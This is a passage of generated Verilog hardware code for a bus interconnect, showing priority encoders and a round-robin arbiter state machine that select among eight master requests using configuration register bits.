            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'h1 ) 
                begin
                    s2_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'h2 ) 
                    begin
                        s2_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s2_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[3] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[3]) ) 
        begin
            s2_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s2_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[4] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[4]) ) 
        begin
            s2_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'h1 ) 
                begin
                    s2_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'h2 ) 
                    begin
                        s2_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s2_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[4] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[4]) ) 
        begin
            s2_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s2_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[5] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[5]) ) 
        begin
            s2_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'h1 ) 
                begin
                    s2_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'h2 ) 
                    begin
                        s2_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s2_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[5] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[5]) ) 
        begin
            s2_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s2_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[6] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[6]) ) 
        begin
            s2_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'h1 ) 
                begin
                    s2_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'h2 ) 
                    begin
                        s2_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s2_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[6] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[6]) ) 
        begin
            s2_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s2_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[7] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[7]) ) 
        begin
            s2_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'h1 ) 
                begin
                    s2_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'h2 ) 
                    begin
                        s2_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s2_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s2_msel_pri_enc_valid[7] or  { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) })
    begin
        if (  !( s2_msel_pri_enc_valid[7]) ) 
        begin
            s2_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'h0 ) 
            begin
                s2_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s2_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s2_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s2_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd0_pri_out_d0 ) : ( s2_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s2_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd1_pri_out_d0 ) : ( s2_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd2_pri_out_d0 ) : ( s2_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd3_pri_out_d0 ) : ( s2_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd4_pri_out_d0 ) : ( s2_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd5_pri_out_d0 ) : ( s2_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd6_pri_out_d0 ) : ( s2_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd7_pri_out_d0 ) : ( s2_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s2_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd0_pri_out_d0 ) : ( s2_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s2_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd1_pri_out_d0 ) : ( s2_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd2_pri_out_d0 ) : ( s2_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd3_pri_out_d0 ) : ( s2_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd4_pri_out_d0 ) : ( s2_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd5_pri_out_d0 ) : ( s2_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd6_pri_out_d0 ) : ( s2_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd7_pri_out_d0 ) : ( s2_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s2_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s2_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s2_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s2_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s2_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s2_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s2_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s2_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd0_pri_out_d0 ) : ( s2_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s2_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd1_pri_out_d0 ) : ( s2_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd2_pri_out_d0 ) : ( s2_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd3_pri_out_d0 ) : ( s2_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd4_pri_out_d0 ) : ( s2_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd5_pri_out_d0 ) : ( s2_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd6_pri_out_d0 ) : ( s2_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s2_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s2_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s2_msel_pri_enc_pd7_pri_out_d0 ) : ( s2_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s2_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s2_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s2_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s2_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s2_next ) 
            begin
                s2_msel_pri_out <= ( ( ( s2_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s2_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s2_msel_pri_enc_pri_out0 ) : ( s2_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s2_msel_arb0_req = { ( s2_msel_req[7] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'd0 ) ), ( s2_msel_req[6] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'd0 ) ), ( s2_msel_req[5] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'd0 ) ), ( s2_msel_req[4] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'd0 ) ), ( s2_msel_req[3] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'd0 ) ), ( s2_msel_req[2] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'd0 ) ), ( s2_msel_req[1] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'd0 ) ), ( s2_msel_req[0] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'd0 ) ) };
    assign s2_msel_arb0_gnt = s2_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s2_msel_arb0_state <= s2_msel_arb0_grant0;
        end
        else
        begin 
            s2_msel_arb0_state <= s2_msel_arb0_next_state;
        end
    end
    always @ (  s2_msel_arb0_state or  { ( s2_msel_req[7] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[15] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[14] ) ) } == 2'd0 ) ), ( s2_msel_req[6] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[13] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[12] ) ) } == 2'd0 ) ), ( s2_msel_req[5] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[11] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[10] ) ) } == 2'd0 ) ), ( s2_msel_req[4] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[9] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[8] ) ) } == 2'd0 ) ), ( s2_msel_req[3] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[7] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[6] ) ) } == 2'd0 ) ), ( s2_msel_req[2] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[5] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[4] ) ) } == 2'd0 ) ), ( s2_msel_req[1] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[3] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[2] ) ) } == 2'd0 ) ), ( s2_msel_req[0] & ( { ( ( ( s2_msel_pri_sel == 2'd2 ) ) ? ( rf_conf2[1] ) : ( 1'b0 ) ), ( ( ( s2_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf2[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s2_msel_arb0_next_state = s2_msel_arb0_state;
        case ( s2_msel_arb0_state ) 
        s2_msel_arb0_grant0:
        begin
            if (  !( s2_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s2_msel_arb0_req[1] ) 
                begin
                    s2_msel_arb0_next_state = s2_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s2_msel_arb0_req[2] ) 
                    begin
                        s2_msel_arb0_next_state = s2_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s2_msel_arb0_req[3] ) 
                        begin
                            s2_msel_arb0_next_state = s2_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s2_msel_arb0_req[4] ) 
                            begin
                                s2_msel_arb0_next_state = s2_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s2_msel_arb0_req[5] ) 
                                begin
                                    s2_msel_arb0_next_state = s2_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb0_req[6] ) 
                                    begin
                                        s2_msel_arb0_next_state = s2_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb0_req[7] ) 
                                        begin
                                            s2_msel_arb0_next_state = s2_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb0_grant1:
        begin
            if (  !( s2_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s2_msel_arb0_req[2] ) 
                begin
                    s2_msel_arb0_next_state = s2_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s2_msel_arb0_req[3] ) 
                    begin
                        s2_msel_arb0_next_state = s2_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s2_msel_arb0_req[4] ) 
                        begin
                            s2_msel_arb0_next_state = s2_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s2_msel_arb0_req[5] ) 
                            begin
                                s2_msel_arb0_next_state = s2_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s2_msel_arb0_req[6] ) 
                                begin
                                    s2_msel_arb0_next_state = s2_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb0_req[7] ) 
                                    begin
                                        s2_msel_arb0_next_state = s2_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb0_req[0] ) 
                                        begin
                                            s2_msel_arb0_next_state = s2_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb0_grant2:
        begin
            if (  !( s2_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s2_msel_arb0_req[3] ) 
                begin
                    s2_msel_arb0_next_state = s2_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s2_msel_arb0_req[4] ) 
                    begin
                        s2_msel_arb0_next_state = s2_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s2_msel_arb0_req[5] ) 
                        begin
                            s2_msel_arb0_next_state = s2_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s2_msel_arb0_req[6] ) 
                            begin
                                s2_msel_arb0_next_state = s2_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s2_msel_arb0_req[7] ) 
                                begin
                                    s2_msel_arb0_next_state = s2_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s2_msel_arb0_req[0] ) 
                                    begin
                                        s2_msel_arb0_next_state = s2_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s2_msel_arb0_req[1] ) 
                                        begin
                                            s2_msel_arb0_next_state = s2_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s2_msel_arb0_grant3:
        begin
            if (  !( s2_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s2_msel_arb0_req[4] ) 
                begin
                    s2_msel_arb0_next_state = s2_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s2_msel_arb0_req[5] ) 
                    begin
